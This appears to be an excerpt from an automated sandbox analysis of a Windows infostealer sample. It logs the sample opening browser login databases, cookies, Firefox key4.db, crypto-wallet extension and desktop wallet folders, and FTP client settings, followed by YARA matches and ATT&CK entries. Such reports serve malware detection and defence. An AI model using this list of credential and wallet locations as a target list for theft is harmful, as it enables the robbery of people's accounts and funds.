                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2223056639.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2297990501.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: tPSrcPbmRe.exe PID: 6480, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: Process Memory Space: tPSrcPbmRe.exe PID: 6480, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
ATT&CK matrix, one line per tactic (the number in parentheses after a technique is the per-technique count shown in the report; techniques without a number carry no count in the report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
